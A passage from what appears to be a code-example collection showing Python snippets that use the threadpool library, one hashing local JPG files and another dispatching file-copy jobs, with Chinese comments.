    pool = threadpool.ThreadPool(5)# 创建一个线程池
    requests = threadpool.makeRequests(loop1, l) #传入函数 及函数需要的参数
    [pool.putRequest(req) for req in requests]# 不理角这段代码,猜测是循环创建线程 分配任务。
    pool.wait()#设置池内所有线程等待。
Example #29
0
import time
import random
import threadpool


def get_hash(path):
    file = open(path, 'rb').read()
    md5 = hashlib.md5(file).hexdigest()
    print(path, md5)


def get_queue(path):
    dui_lie = []
    file_stream = os.walk(path, True)
    for dirs in file_stream:
        prepath = dirs[0]
        for k in dirs[2]:
            if '.JPG' in k:
                filename = k
                p = prepath + '/' + filename
                dui_lie.append(p)
    return dui_lie


if __name__ == '__main__':
    duilie = get_queue('/Volumes/qifei/照片汇总')
    pool2 = threadpool.ThreadPool(100)
    for n in threadpool.makeRequests(get_hash, duilie):
        pool2.putRequest(n)
    pool2.wait()
Example #30
0
    for attr in attrs:
        # if attr in notdealed:
        # source_url.append(source_addr + attr)
        # dire_url.append(dire_addr + attr)#attr[0: attr.index('.')] + r"_ID.txt")
        source_url = []
        source_url.append(source_addr + attr)
        source_url.append(dire_addr +
                          attr)  #attr[0: attr.index('.')] + r"_ID.txt")
        # print(source_url)

        # func.append((source_url,None))
        func.append(source_url)
    # print(func)
    # exit()
    """多线程编程"""
    pool = tp.ThreadPool(len(attrs))
    requests = tp.makeRequests(job, func)
    [pool.putRequest(req) for req in requests]
    pool.wait()
    # print(source_url[0],dire_url[0])
    # exit()
    # job(source_url[0],dire_url[0])
    # print(source_url)
    # exit()
    # p1 = mp.Process(target=job,args=(source_url,dire_url,),name='p1')
    # p1.start()
    # p1.join()
    # # print(source_url)
    # # print(dire_url)
    # # exit()